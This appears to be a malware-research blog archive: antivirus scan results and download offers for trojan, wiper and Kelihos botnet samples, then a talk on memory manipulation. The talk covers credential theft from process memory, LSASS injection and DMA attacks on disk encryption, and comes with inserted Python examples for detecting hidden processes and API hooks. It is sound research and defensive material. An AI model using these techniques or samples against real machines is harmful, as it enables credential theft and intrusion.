> CGMiner: An open source bitcoin mining tool used for performing CPU intensive work in exchange for Bitcoin currency"

Automatic scans

https://www.virustotal.com/file/12359624ee184639aef4ccca03751ae9ce1371512de52a3a4bfda1970edd0c60/analysis/1356590536/
SHA256: 12359624ee184639aef4ccca03751ae9ce1371512de52a3a4bfda1970edd0c60
SHA1: 93cf1d65e0374410a9a827256a923fdb8f5f38ca
MD5: a0552d1bc1a4897141cfa56f75c04857
File size: 10.0 MB ( 10491998 bytes )
File name: vti-rescan
File type: Win32 EXE
Detection ratio: 12 / 44
Analysis date: 2012-12-27 06:42:16 UTC ( 1 minute ago )
AntiVir | TR/Drop.Injector.gmtj | 20121226
Avast | Win32:FakeAV-EEX [Trj] | 20121227
AVG | Win32/Cryptor | 20121226
CAT-QuickHeal | TrojanDropper.Injector.gmtj | 20121227
ESET-NOD32 | a variant of Win32/Injector.YYR | 20121226
Fortinet | W32/Injector.YYR!tr | 20121227
GData | Win32:FakeAV-EEX | 20121227
Ikarus | Trojan.SuspectCRC | 20121227
Kaspersky | Trojan-Dropper.Win32.Injector.gmtj | 20121227
Panda | Trj/CI.A | 20121226
TrendMicro-HouseCall | TROJ_GEN.R47B1LM | 20121227
VIPRE | Trojan.Win32.Generic!BT | 20121227

https://www.virustotal.com/file/d5aa610a046132f43e3efeb47a0edce10c2d99a641eda8e1d6635f8b9dab44d3/analysis/1356590487/
SHA256: d5aa610a046132f43e3efeb47a0edce10c2d99a641eda8e1d6635f8b9dab44d3
SHA1: 21ff7e6c1bc9fb2977f45cde72599a831be3af03
MD5: 2e1814cccf0c3bb2cc32e0a0671c0891
File size: 17.1 MB ( 17949744 bytes )
File name: vti-rescan
File type: Win32 EXE
Detection ratio: 25 / 44
Analysis date: 2012-12-27 06:41:27 UTC ( 1 minute ago )
AhnLab-V3 | Dropper/Win32.Injector | 20121226
AntiVir | TR/FakeAV.92.391 | 20121226
Avast | Win32:FakeAV-EEX [Trj] | 20121227
AVG | Dropper.Generic7.TIN | 20121226
BitDefender | Gen:Variant.FakeAV.92 | 20121227
CAT-QuickHeal | TrojanDropper.Injector.ggbl | 20121227
Comodo | UnclassifiedMalware | 20121227
ESET-NOD32 | a variant of Win32/Injector.YYR | 20121226
F-Secure | Gen:Variant.FakeAV.92 | 20121227
Fortinet | W32/Injector.YYR | 20121227
GData | Gen:Variant.FakeAV.92 | 20121227
Ikarus | Trojan.SuspectCRC | 20121227
K7AntiVirus | Riskware | 20121226
Kaspersky | Trojan-Dropper.Win32.Injector.ggbl | 20121227
McAfee | Artemis!2E1814CCCF0C | 20121227
McAfee-GW-Edition | Artemis!2E1814CCCF0C | 20121226
MicroWorld-eScan | Gen:Variant.FakeAV.92 | 20121227
Norman | W32/Troj_Generic.FPNGA | 20121226
Panda | Trj/CI.A | 20121226
Symantec | WS.Reputation.1 | 20121227
TrendMicro | TROJ_GEN.RCBZ7LB | 20121227
TrendMicro-HouseCall | TROJ_GEN.RCBZ7LB | 20121227
VBA32 | Trojan-Dropper.Injector.ggbl | 20121226
VIPRE | Trojan.Win32.Generic!BT | 20121227
ViRobot | Dropper.A.Injector.17949744 | 20121227

Others have similar detection - mostly generic for this type of malware:
19/45 https://www.virustotal.com/file/4eb9799a2c4febffb81260abb889c909b4eaa28344a4e708d2b3231985311ec3/analysis/1356590570/
34/45 https://www.virustotal.com/file/ab8b7a7e6d5e2f98e85489c0d71e005842c3a6e085f8c4dd9f3011bfc9dbc18d/analysis/1356590585/
13/45 https://www.virustotal.com/file/9646ebf177136d9a1b3c08aad6b05ce2fca96c6e7a0d32f68d0218b9fe0c40b8/analysis/1356590598/
21/45 https://www.virustotal.com/file/e46ad827327bdcf841d0eea03675e2f7b3eafbe3a9b8fab96a9e3df586480870/analysis/1356590507/
13/45 https://www.virustotal.com/file/9646ebf177136d9a1b3c08aad6b05ce2fca96c6e7a0d32f68d0218b9fe0c40b8/analysis/

DEC 2012 BATCHWIPER SAMPLES
January 18, 2013, 4:35 am

Update: Jan 18, 2013 - Here is a nice analysis: BatchWiper Analysis by Emanuele De Lucia. The next time the virus will wake up is Jan 21, 2013. Time to grab it, read and play.

Several people asked for Batchwiper, so here are the samples.

From Maher - Iranian CERT:
The latest investigation done by the Maher center in cyber space identified a new targeted data wiping malware. Primitive analysis revealed that this malware wipes files on different drives at various predefined times. Despite its simplicity in design, the malware is efficient and can wipe disk partitions and user profile directories without being recognized by anti-virus software. However, it is not considered to be widely distributed. This targeted attack is simple in design and it has no similarity to the other sophisticated targeted attacks. The identified components of this threat are listed in the following table:

Name | MD5
GrooveMonitor.exe [dropper] | f3dd76477e16e26571f8c64a7fd4a97b
juboot.exe | fa0b300e671f73b3b0f7f415ccbe9d41
jucheck.exe | c4cd216112cbc5b8c046934843c579f6
SLEEP.EXE | ea7ed6b50a9f7b31caeea372a327bd37
WmiPrv.exe | b7117b5d8281acd56648c9d08fadf630

File
Download. Email me if you need the password

TROJAN 'NAP' AKA KELIHOS/HLUX STATUS UPDATE BY DEEPEND RESEARCH AND SAMPLES
February 10, 2013, 3:09 pm

FireEye posted details about the sleep function found in Kelihos/Hlux (An encounter with Trojan Nap), which is interesting, and indeed is present in some of the samples we saw. The trojan, of course, has many more features, and most of them were documented in previous publications online.

This post is a quick update on the state of the Kelihos/Hlux botnet, along with the list of known fast flux domains (1500+) associated with Kelihos distribution or Command&Control (current > 2012). The current and most active name servers are pointing to ns[1-6].boomsco.com, ns[1-6].larstor.com, and ns[1-6].zempakiv.ru, which are also fast flux domains. The double fast flux nature of the botnet makes it very difficult to take down, and sinkholing is a temporary measure. Despite the two large attempts to take it down (Sep. 2011 and Mar. 2012), the botnet is definitely on the rise again. Please read the rest of our post here: http://www.deependresearch.org/2013/02/trojan-nap-aka-kelihoshlux-feb-2013.html. You can download the associated binaries (97 files) and pcap below.

Download
Download the file set (97 files, see the listing below). Email me if you need the password
Download the pcap (no password) - for 0C921935F0880B5C2161B3905F8A3069

Files Information
97 files, there are a few variants, the files are recent and mostly active

MANIPULATING MEMORY FOR FUN AND PROFIT BY FRÉDÉRIC BOURLA - HIGH-TECH BRIDGE
February 15, 2013, 6:57 pm

I am sure you remember the excellent reverse engineering presentations by High-Tech Bridge experts I posted earlier. High-Tech Bridge presented at the ISACA event in Luxembourg and you can download their detailed and very interesting presentation: "Manipulating Memory for Fun and Profit".
The presentation includes a detailed memory forensics process using Volatility.

by Frédéric BOURLA
Chief Security Specialist
Head of Ethical Hacking & Computer Forensics Departments
High-Tech Bridge SA

Table of Contents
0x00 - About me
0x01 - About this conference
0x02 - Memory introduction
0x03 - Memory manipulation from an offensive angle
0x04 - Memory manipulation from a defensive angle
0x05 - Conclusion

Download the full presentation in PDF

The text of the presentation (for Google search and to get an idea about the contents):

========================
Manipulating Memory for Fun & Profit
6 February 2013
Frédéric BOURLA
Chief Security Specialist
========================
# readelf prez
* Slides & talk in English.
* Native French speaker, so feel free to send me an email in French in case of question.
* Talk focused on Memory Manipulation, from both offensive and defensive angles.
* 1 round of 45’.
* Vast topic, lots of issues to address, and lots of slides so that the most technical of you can come back later to remember commands.
* Therefore some slides [specially the beginning] will be fast, but everything is summarized in demos.
* No need to take notes, the whole slides and demos will be published on the High-Tech Bridge website.
========================
# readelf prez
* Despite its name, this talk will not deal with Total Recall or any other human memory manipulation based movie.
* Nor will it deal with classical binary exploitation, such as Stack based Buffer Overflows or Heap Spraying. I strongly advise reading corelanc0d3r’s papers on corelan.be to learn more regarding Exploit Writing.
========================
Table of contents
0x00 - About me
0x01 - About this conference
0x02 - Memory introduction
0x03 - Memory manipulation from an offensive angle
0x04 - Memory manipulation from a defensive angle
0x05 - Conclusion
========================
# man mem
* RAM (Random Access Memory) is a temporary memory accessible by the CPU in order to hold all of the program code and data that is processed by the computer.
* It is called “random” because the system can directly access any of the memory cells anywhere on the RAM chip if it knows its row (i.e. “address”) and its column (i.e. “data bit”).
* It is much faster to access data in RAM than on the hard drive.
* CPU and OS determine how much and how the available memory will be used.
========================
# man mem
* In other words, most users do not have any control on memory, which makes RAM a target of choice.
* First systems were arbitrarily limited to 640Kb RAM. Bill Gates once declared that “640K ought to be enough for anybody”.
* At this time it was far enough… But today the OS itself can consume 1 Gb. We therefore use much more memory.
* On a 32 bits Windows system, the OS can directly address 2^32 cells, and is therefore mathematically limited to 4 Gb memory.
========================
# man mem
* Contrary to popular assumption, RAM can retain its content up to several minutes after a shutdown.
* Basically RAM is everywhere nowadays. Printers, fax, VoIP phones, GPS and smartphones are good examples.
* This provides some opportunities to security professionals [and also to bad guys]. Some points of this talk can be applied to various targets and may not be limited to Windows systems, even if from now on we will deal with a classical Microsoft host.
========================
# man mem
* Upon process instantiation, the code is mapped in memory so that the CPU can read its instructions, and each process has its own virtual memory.
* OS relies on page table structures to map transparently each virtual memory address to physical memory.
* But most importantly, any program [including both its data and its instructions] must first be loaded into memory before being run by the processor.
========================
# man mem
* For example, FUD Trojans which highly rely on Packers & Crypters can be quickly uncovered through memory analysis.
* The same principle applies to OTFE. Memory Analysis can save your investigator's life, should you be facing a drive with On The Fly Encryption capabilities. To be efficient, transparent and usable, the [encrypted] key should be somewhere in memory.
========================
Table of contents
0x00 - About me
0x01 - About this conference
0x02 - Memory introduction
0x03 - Memory manipulation from an offensive angle
0x04 - Memory manipulation from a defensive angle
0x05 - Conclusion
========================
Post keylogging capacities
* A colleague just used your laptop to access a restricted page, and you regret you didn’t have time to run your favourite keylogger? :-]
========================
Post keylogging capacities
* Not a problem, you may be able to browse the Internet browser’s memory to grab his credentials.
========================
Post keylogging capacities
* Besides this joke, have you ever wished you had saved your new email before a touchpad problem occurs and makes you lose 30 minutes?
========================
Post keylogging capacities
* But you may not be obliged to restart writing everything from scratch if you browse the process memory shortly.
========================
Stars revelation
* In a pivoting attack, it can be very useful to reveal what’s behind the stars... Don’t forget, Windows remembers lots of passwords on behalf of users.
* Lots of tools do exist, such as Snadboy's Revelation. Unfortunately, most of them do not work against recent OS.
* BulletsPassView is one of the remaining tools which still works under Windows 7.
There is even a 64-bit version.
* Anyway, it also does not work under Windows 8.
========================
Stars revelation
========================
Stars revelation
* Pillaging passwords often provides the keys of the kingdom.
========================
Memory Patching
* Memory Patching is the first stone to build a Crack or create a Keygen in the Warez world.
* It basically consists in locating and bypassing binary protections in memory in order to finally implement the trick in the targeted file.
========================
Memory Fuzzing
* Fuzz Testing, aka Fuzzing, consists in providing invalid, unexpected, or random data to the inputs of a monitored program to detect security issues [among others].
* General approach to Fuzzers:
========================
Memory Fuzzing
* Memory-oriented Fuzzing:
========================
Memory Fuzzing
* Here is an example from dbgHelp4j, a memory fuzzing project under development at High-Tech Bridge:
* To learn more, read Xavier ROUSSEL's paper.
* This short demonstration shows how dbgHelp4j permits to rapidly identify an old buffer overflow in the CWD command of Easy FTP Server v1.7.0.11.
========================
DLL Injection
* Another well-known memory abuse consists in injecting arbitrary code into the memory space of another process, for example through a CreateRemoteThread-like function.
* Such an injection permits the attacker to benefit from the rights of the target process, and often to bypass firewalls.
* This also enables its author to hide from most users, as threads are not displayed in the Windows Task Manager.
========================
DLL Injection
* The native Task Manager does not display the current threads within a process.
========================
DLL Injection
* Here a DLL-based Reverse Trojan is injected into IE's memory space.
========================
DLL Injection
* The Trojan reaches its C&C server via HTTP through Internet Explorer [whose behaviour looks legitimate].
========================
DLL Injection
* From a Pivoting Attack point of view, DLL Injection is widely used during Privilege Escalation.
* There are a lot of tools, such as CacheDump, PWDump6, LSADump2 or PWDumpX.
* Most tools actually inject their nasty code into the Local Security Authority Subsystem (LSASS) to reach hashes.
* The latter is amazingly efficient and permits a user with administrative privileges to retrieve [either locally or remotely] the domain password cache, password hashes and LSA secrets from a Windows system.
========================
Process Memory Dump
* Some processes write sensitive data in memory in clear text, or without relying on heavy encryption.
* Specific process memory dumps may allow an attacker to grab interesting data.
* Lots of tools do exist. One of the best ones is probably ProcDump, from Mark Russinovich.
* It's a powerful command-line utility whose primary purpose is to monitor applications for CPU spikes in order to generate a crash dump, with the purpose of helping the developer to debug.
========================
Process Memory Dump
* It has plenty of amazing features. Anyway, here our goal is simply to dump the memory contents of a process to a file [without stopping the process, of course].
* So lots of tools can also do the job, such as PMDump from NTSecurity.
* Sometimes we can find very sensitive information, such as usernames, computer names, IP addresses, and even passwords.
* This is for example the case if you dump the memory of PwSafe. Not all fields are encrypted in memory.
========================
Process Memory Dump
* For sure, password fields are not stored in memory in plaintext, but unfortunately other fields are. And sysadmins' notes are often very juicy...
* There is hope to collect credentials, map network resources, identify services, ports, sudoers accounts, and so on.
* Even if the auditor is unlucky and does not grab passwords, he can still create a user list file for further dictionary attacks.
========================
Process Memory Dump
* Process Memory Dump files are quite light.
* During a Pivoting Attack in an Internal Penetration Test, it may be worth a try to launch a memory dump against sensitive processes.
========================
Process Memory Dump
* Something as easy as parsing the process memdump for strings may reveal interesting stuff to a pentester.
========================
Process Memory Dump
* Here the Password Safe application permits an attacker to fingerprint the network, and to collect usernames, IP addresses and ports.
* Very useful to carry out further attacks.
========================
Process Memory Dump
* Here the network administration tool mRemote leaks the internal path, IP address and TCP port of an SSH-enabled server... As well as the username & password of a root account!
========================
Full Memory Dump
* If you have good bandwidth and you are not too limited by time, why not dump the whole memory?
* An offline analysis of the whole memory dump may reveal even more important stuff. Even in the case of FDE, users may have opened sensitive TXT documents, for example.
* You may add DumpIt to your toolkit. It is a one-click memory acquisition application for Windows released by MoonSols. It's a great tool which combines win32dd and win64dd in one executable. It is fast, small, portable, free and ultra easy to use. Just run it to dump the physical memory into the current directory.
========================
Cold Boot Attacks
* It is a common belief that RAM loses its content as soon as the power is down.
* This is wrong: RAM is not immediately erased. It may take up to several minutes in a standard environment, even if the RAM is removed from the computer.
* And it may last much longer if you cool the DRAM chips. With a simple duster spray at -50°C, your RAM data can survive more than 10 minutes.
* If you cool the chips to -196°C with liquid nitrogen, data is held for several hours without any power.
========================
Cold Boot Attacks
* It is then possible to plug the RAM into another system to dump its content and carry out an offline analysis.
* In particular, encryption tools rely deeply on RAM to store their keys. Therefore such attacks are mostly aimed at defeating FDE, such as BitLocker, FileVault, dm-crypt, and TrueCrypt.
* And even if there is some degradation in the memory contents, some algorithms can intelligently recover the keys.
* To know more, read the Princeton University paper.
========================
DMA based attacks
* IEEE 1394, aka FireWire, is a serial bus interface standard for high-speed communications and isochronous real-time data transfer.
* According to Wikipedia, it "supports DMA and memory-mapped devices, allowing data transfers to happen without loading the host CPU with interrupts and buffer-copy operations".
* In other words, you can read [and write] the target's memory through its FireWire interface!
* This security problem is not new [2004], but still exists today as it relies on the IEEE 1394 specifications.
========================
DMA based attacks
* A few years ago, attackers could use WinLockPwn. Today they have the Inception tool, from ntropy.
* Inception is a physical memory manipulation and hacking tool which nicely exploits IEEE 1394 SBP-2 DMA [Serial Bus Protocol 2].
* The tool can unlock and escalate privileges to Administrator / Root on almost any powered-on machine you have physical access to.
* The tool works over any interface that expands and can master the PCIe bus, such as FireWire, Thunderbolt, ExpressCard and PCMCIA (PC-Card).
========================
DMA based attacks
* It was initially made to attack computers that use FDE, such as BitLocker, FileVault, TrueCrypt or Pointsec.
* You just need a Linux / Mac OS X system and a target which provides a FireWire / Thunderbolt interface, or an ExpressCard / PCMCIA expansion port.
* There are for sure some limitations, such as the 4 GiB RAM bug or the restrictions on OS X Lion targets [which disables DMA when the user is logged out, as well as when the screen is locked if FileVault is enabled], but most often FireWire means P0wned.
========================
DMA based attacks
* Just a few lines to install on your BackTrack:
* The following short demo of Inception exploits the FireWire interface of an up-to-date Windows 7 system to patch the msv1_0.dll file and unlock the running session.
========================
DMA based attacks
* This kind of DMA-based attack also permits attacking mounted encrypted volumes, such as a TrueCrypt archive.
* You can for example boot your attacking system with the PassWare FireWire Memory Imager from Passware Kit Forensics, and search for AES keys in the target memory through FireWire.
* You can basically defeat BitLocker, TrueCrypt, FileVault2 & PGP encrypted volumes.
* To know more:
http://www.breaknenter.org/projects/inception/
http://support.microsoft.com/kb/2516445
========================
DMA based attacks
* The following slides illustrate an attack on a TrueCrypt volume created on an 8 Gb memory stick.
* The first step was to back up the encrypted drive.
========================
DMA based attacks
* Then let's begin the attack on a mounted volume once the user has left.
========================
DMA based attacks
* Dump the physical memory of the target system through our favourite FireWire interface.
========================
DMA based attacks
* And attack the key material in memory...
========================
DMA based attacks
* The attack only lasts a couple of minutes.
========================
DMA based attacks
* And you should get an unencrypted raw volume.
========================
DMA based attacks
* You just have to fill a new memory stick with this raw image...
========================
DMA based attacks
* And that's it!
Just plug in your new device...
========================
DMA based attacks
* And enjoy your TrueCrypt-less volume.
========================
Table of contents
0x00 - About me
0x01 - About this conference
0x02 - Memory introduction
0x03 - Memory manipulation from an offensive angle
0x04 - Memory manipulation from a defensive angle
0x05 - Conclusion
========================
Circumventing FDE
* The traditional Forensics approach faces problems with encryption, especially with FDE.
* If the investigator "pulls the plug" and creates a bit-for-bit image of the physical hard drive, he most probably destroys the best chance of recovering the plaintext data, as well as all common memory artefacts.
* With FDE, it is usually far better to make a bit-for-bit image of the logical device while the system is still running, even if underlying disk activity is generally not welcome... And even if we rely on an untrusted OS to present what is actually on the disk, and are therefore prone to anti-forensic techniques.
========================
Circumventing FDE
* If we begin by capturing the volatile memory, then we can potentially extract the cryptographic keys from the memory image to decrypt and analyse the disk image.
* The only challenge usually consists in uniquely identifying key material among gigabytes of other data.
* It is usually achieved with a mix of entropy analysis [limited because of the short length of symmetric keys and the randomness of other data, such as compressed files] and brute force [a Known-Plaintext Attack, where the attacker has samples of both the plaintext and the ciphertext].
* To learn more: "RAM is Key - Extracting Disk Encryption Keys From Volatile Memory", by B. Kaplan and M. Geiger.
========================
Code Analysis via API Hooking
* A quick way to get an idea of what a binary does is to analyse its API calls.
* You can do it easily with APISpy32 for example, from Pietrek.
* You just need to populate a configuration file with the names of all the APIs [e.g. obtained via strings] for which you want to enable hooking, and you get a nice malcode monitoring tool.
* The next slide shows common API use in malware.
========================
Code Analysis via API Hooking
Common API | Malware
URLDownloadToFile, FtpGetFile, FtpOpenFile | Dropper
CreateRemoteThread, NtWriteVirtualMemory, LoadLibrary and similar (LoadLibraryA, LoadLibraryExA, LoadLibraryExW, etc.) | Injection
BeginPaint (to disable local screen changes when a VNC session is activated) | Zeus
Accept, Bind | Backdoor
Connect, CreateNamedPipe, ConnectNamedPipe, DisconnectNamedPipe | Dropper and Reverse Trojan
IsDebuggerPresent, CheckRemoteDebuggerPresent | Anti debugger
========================
Code Analysis via API Hooking
Common API | Malware
CryptCreateHash, CryptEncrypt, CryptGetHashParam | Encryption
DeviceIoControl, NtLoadDriver, NtOpenProcess | Rootkit
HttpOpenRequest, HttpSendRequest, InternetConnect | Exfiltration
ModifyExcuteProtectionSupport, EnableExecuteProtectionSupport, NtExecuteAddFileOptOutList | DEP
SetSfcFileException | Windows File Protection alteration
========================
Memory Forensics
* It is probably the best way to identify the most hidden evil code, such as Rootkits.
* And don't forget that some malware can live in memory without ever touching the hard disk. This is for example the case with the MSF Meterpreter, which is injected into an existing process's memory.
* Stealth malware also works in that manner [mostly in targeted hacking against big companies].
* Hard disks are amazingly big today. Simply creating a raw image can take a very long time... Sometimes several days. Analysing memory is much faster.
========================
Memory Forensics
* But there are also some minor drawbacks... Indeed, the memory image will only give us information on what was running at a particular time.
We will not see the most visible piece of malcode if it was not running when we proceeded with the imaging [unless some tracks remain in undeleted structures].
* And for sure, to make an image of the memory we first need to run a specific utility once... Which will be loaded into the target's memory! As a consequence, it is always possible to alter evidence [even if the chances are really low with a light utility].
* Anyway, it is definitely worth a try, as a fast analysis can help you spot the evidence very quickly. :-]
========================
Memory Forensics
* Any kind of physical memory abstraction could be usable, such as a Memory Dump, a Crash Dump, a hibernation file or a VMEM file for virtual machines.
========================
Memory Forensics
* Memory Forensics is a very huge project, as memory mappings differ between OS, SP and patch levels, and as vendors usually do not really document their internal memory structures.
* Nevertheless, it has been mature and efficient for a few years now. Nowadays, we are not limited anymore to ASCII and Unicode grep, and we can rely on powerful tools which parse well-known memory structures.
========================
Memory Forensics
* For sure, we are still facing challenging problems, and tools may be limited by Paging and Swapping, which can prevent investigators from analysing the whole virtual address space of a specific process [unless they also dig into pagefile.sys, for example]...
* But it is still really effective for Malware Analysis!
* Besides commercial tools, free solutions do exist, such as Radare and Volatility. The latter has simply become impressive.
* Since last year, Volatility also supports Mac systems.
========================
Memory Forensics
* Should you need to carry out Memory Forensics on a Windows, Linux, Mac or Android system, I strongly advise you to have a look at Volatility.
* It is basically a Python-based tool for extracting digital artefacts from volatile memory [RAM] samples, which offers amazing visibility into the runtime state of the system.
* You can easily identify running processes and their DLLs, Virtual Address Descriptors [VAD], system call tables [IDT, GDT, SSDT], environment variables, network connections, open handles to kernel and executive objects, and so on.
========================
Memory Forensics
* It can even be used to dump LM and NTLM hashes, as well as LSA secrets...
========================
Memory Forensics
* Well, for French targets there is a little bug [because of accents]... You will have to adapt the code a little bit:
========================
Memory Forensics
* But besides this, it is really efficient for tracking malcode. Let's dig into a real example...
========================
Memory Forensics
* Heavy malware may be digitally signed by a trusted CA.
========================
Memory Forensics
* And may really appear benign to your users.
========================
Memory Forensics
* Here it was an obfuscated .NET-based Dropper.
========================
Memory Forensics
* Even if you manually find the embedded payload, nearly everything is packed to disturb Reverse Engineers.
========================
Memory Forensics
* The only unencrypted payload was a kind of anti-restoring feature, which basically hooks specific APIs to prevent system administrators from removing the malware [e.g. by killing their task manager].
* And then? What's next? We could spend lots of time in a Reverse Engineering phase, or analyse its behaviour in a sandbox [if the code doesn't detect it]...
* ...Or we can simply see what happens in memory.
========================
Memory Forensics
* Just voluntarily infect your VM or your lab workstation.
* And use one of the good existing tools to dump the whole memory:
  * Memoryze from Mandiant
  * FTK Imager from AccessData
  * FastDump from HBGary
  * DumpIt and Win32dd / Win64dd from MoonSols
  * And of course your favourite FireWire interface
* Before using Volatility to dissect this memory dump.
========================
Memory Forensics
* Let's begin by getting basic information on our dump file.
========================
Memory Forensics
* The PSLIST command quickly shows processes.
========================
Memory Forensics
* You can arrange them in a tree view.
========================
Memory Forensics
* This process list can be quickly obtained by parsing a kernel doubly-linked list. Nevertheless, this list can be altered by malware, such as Rootkits, which thereby hide themselves from common system tools.
* A deeper search can then be achieved, which consists in parsing the whole memory dump to locate EPROCESS structures. These kernel structures do exist for each process, whatever the state of the doubly-linked list [known as the Process Control Block].
* A process listed in a PSSCAN and not in a PSLIST often indicates a threat [mostly achieved via API Hooking].
========================
Memory Forensics
* The PSSCAN is longer but may reveal hidden code.
========================
Memory Forensics
* Similarly, you can find processes which attempt to hide themselves from various process listings through the PSXVIEW command:
========================
Memory Forensics
* Several Volatility commands work in this way and offer a SCAN variant to try to recognize specific structures in memory, thus revealing hidden sockets and connections, for example.
* For sure you may have [often quickly identified] false positives, as some processes may have been legitimately closed, for example, thus leaving some orphan EPROCESS data structures in RAM.
* Nevertheless, some processes may still be really running, and therefore instantaneously reveal a serious security issue.
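The list-walk versus carve cross-view described on the slides above (a block found by the scan but missing from the linked list is suspicious, unless the process simply exited), as an added Python example that is not code from the talk or from Volatility. The 40-byte process block layout, the pool tag, the image contents and the process names are all constructed for this demonstration and are not the real Windows EPROCESS layout.

```python
import struct
from dataclasses import dataclass

# Constructed, simplified process block (NOT the real Windows EPROCESS layout):
#   0  tag        4s   pool tag "Proc"
#   4  pid        I
#   8  flink      I    image offset of the next block in the active-process list
#  12  blink      I    image offset of the previous block
#  16  name       16s  image name, NUL padded
#  32  exit_time  I    0 while running, non-zero once the process has exited; 4 pad bytes follow
FMT = "<4sIII16sI4x"
SIZE = struct.calcsize(FMT)  # 40 bytes
TAG = b"Proc"
LIST_HEAD = 0  # offset of the block that heads the list ("System" here)


@dataclass
class Proc:
    offset: int
    pid: int
    name: str
    exited: bool


def parse_block(img, off):
    """Parse a candidate block; return (Proc, flink) or None if it is not plausible."""
    if off + SIZE > len(img):
        return None
    tag, pid, flink, blink, raw_name, exit_time = struct.unpack_from(FMT, img, off)
    if tag != TAG:
        return None
    # psscan-style sanity checks: list pointers must stay inside the image and the
    # name must be printable ASCII. A stray "Proc..." text string fails these checks.
    if flink >= len(img) or blink >= len(img):
        return None
    name = raw_name.split(b"\x00", 1)[0]
    if not name or not all(0x20 <= c < 0x7F for c in name):
        return None
    return Proc(off, pid, name.decode("ascii"), exit_time != 0), flink


def pslist(img):
    """Walk the doubly linked list from its head, the way PSLIST does."""
    found, off = [], LIST_HEAD
    while True:
        parsed = parse_block(img, off)
        if parsed is None:
            break
        proc, flink = parsed
        found.append(proc)
        off = flink
        if off == LIST_HEAD or len(found) > len(img) // SIZE:  # ring closed / loop guard
            break
    return found


def psscan(img):
    """Carve every plausible block out of the whole image, the way PSSCAN does."""
    found = []
    off = img.find(TAG)
    while off != -1:
        parsed = parse_block(img, off)
        if parsed is not None:
            found.append(parsed[0])
        off = img.find(TAG, off + 1)
    return found


def cross_view(img):
    """Blocks found by the scan but missing from the list walk, split into
    genuinely hidden (still running) and orphaned (already exited) entries."""
    listed = {p.offset for p in pslist(img)}
    unlisted = [p for p in psscan(img) if p.offset not in listed]
    hidden = [p for p in unlisted if not p.exited]
    orphan = [p for p in unlisted if p.exited]
    return hidden, orphan


def build_image():
    """Constructed 4 KiB memory image: four linked processes, one process unlinked
    from the list DKOM-style, one exited process left in memory and a decoy string."""
    img = bytearray(4096)

    def put(off, pid, flink, blink, name, exit_time=0):
        struct.pack_into(FMT, img, off, TAG, pid, flink, blink, name, exit_time)

    # Linked ring: System(0) -> smss(320) -> svchost(1000) -> explorer(1600) -> System
    put(0, 4, 320, 1600, b"System")
    put(320, 300, 1000, 0, b"smss.exe")
    put(1000, 700, 1600, 320, b"svchost.exe")
    put(1600, 1200, 0, 1000, b"explorer.exe")
    # Hidden: its neighbours now skip it, but its own pointers still reference them
    put(2400, 1337, 1600, 1000, b"evil.exe")
    # Orphan: an exited notepad whose block has not been reused yet
    put(3000, 2200, 0, 0, b"notepad.exe", exit_time=0x5114F2A0)
    # Decoy: plain text that happens to start with the pool tag
    img[3600:3616] = b"Process Explorer"
    return bytes(img)


if __name__ == "__main__":
    hidden, orphan = cross_view(build_image())
    print("hidden:", [(p.pid, p.name) for p in hidden])
    print("exited:", [(p.pid, p.name) for p in orphan])
```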
========================
Memory Forensics
* Established and recently closed connections are also quickly revealed.
========================
Memory Forensics
* And you can also easily explore the registry, which is widely used by malcode writers for various purposes [e.g. to allow their code to survive a reboot].
========================
Memory Forensics
* As well as querying loaded drivers [often used by Rootkits].
========================
Memory Forensics
* You can even parse loaded libraries to detect API Hooking, also widely used by Rootkits. Here a trampoline has been placed in the wbemcomm DLL [to hook certain WMI queries].
========================
Memory Forensics
* You can extract suspicious files [through PID or offset] from the memory dump to carry out further investigation.
========================
Memory Forensics
* And quickly identify a Key Logger.
========================
Memory Forensics
* In fact, you can enumerate all opened files and even loaded DLLs within a specific process... And drop them back on disk for investigation.
========================
Memory Forensics
* The dumped process may not be runnable, but would still offer you quite easy to understand code [at least you don't have to unpack it anymore]. For example:
strings dumpedfile | egrep -i 'http|ftp|irc|\.exe'
* Even more powerful, you can rely on the MALFIND command to perform advanced searches using Regex, Unicode or ANSI strings...
* And most importantly, it permits quickly finding hidden or injected code through VAD tree inspection [very useful in the case of a DLL which may have been unlinked from the LDR lists by the malcode loader in order to avoid detection].
========================
Memory Forensics
* Here the MALFIND command reveals that arbitrary code was injected into the CSRSS.exe system process.
========================
Memory Forensics
* We can quickly parse the MALFIND results to bring out running processes which were infected by such code injection.
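The trampoline check behind the wbemcomm slide above, as an added Python example that is neither the talk's code nor Volatility's apihooks plugin: it decodes the first instruction of each export of a constructed 32-bit module and flags transfers whose destination lies outside the module's own address range. The module image, its base address, export RVAs and the injected-region address are all made up for this demonstration.

```python
import struct
from collections import namedtuple

# Constructed 32-bit module (NOT a real wbemcomm.dll): base address, size and
# an export table mapping export name -> RVA of the function's first bytes.
MODULE_BASE = 0x10000000
MODULE_SIZE = 0x4000
INJECTED = 0x00410000  # made-up address of a private region outside the module

Hook = namedtuple("Hook", "export va target opcode")


def make_module():
    """Build the constructed module image: one clean export, three exports hooked
    with different trampoline styles, and one intra-module jump thunk."""
    img = bytearray(MODULE_SIZE)
    exports = {}
    # Clean hot-patchable prologue: mov edi,edi / push ebp / mov ebp,esp
    exports["CleanA"] = 0x1000
    img[0x1000:0x1005] = b"\x8b\xff\x55\x8b\xec"
    # Inline hook: jmp rel32 straight into the injected region
    exports["HookedJmp"] = 0x1100
    rel = INJECTED - (MODULE_BASE + 0x1100 + 5)
    img[0x1100:0x1105] = b"\xe9" + struct.pack("<i", rel)
    # Inline hook: push imm32 / ret
    exports["HookedPushRet"] = 0x1200
    img[0x1200:0x1206] = b"\x68" + struct.pack("<I", INJECTED + 0x20) + b"\xc3"
    # Inline hook: jmp dword ptr [slot], with the pointer slot inside the module
    exports["HookedIndirect"] = 0x1300
    img[0x1300:0x1306] = b"\xff\x25" + struct.pack("<I", MODULE_BASE + 0x3000)
    img[0x3000:0x3004] = struct.pack("<I", INJECTED + 0x40)
    # Short jmp that stays inside the module (compiler thunk): not a hook
    exports["IntraJmp"] = 0x1400
    img[0x1400:0x1402] = b"\xeb\x10"
    return bytes(img), exports


def in_module(va):
    return MODULE_BASE <= va < MODULE_BASE + MODULE_SIZE


def read_u32(img, rva):
    return struct.unpack_from("<I", img, rva)[0]


def branch_target(img, rva):
    """Decode an unconditional transfer at the start of a function, if there is
    one, and return its absolute destination; None means no transfer."""
    va = MODULE_BASE + rva
    op = img[rva]
    if op == 0xE9 and rva + 5 <= len(img):                           # jmp rel32
        rel = struct.unpack_from("<i", img, rva + 1)[0]
        return (va + 5 + rel) & 0xFFFFFFFF
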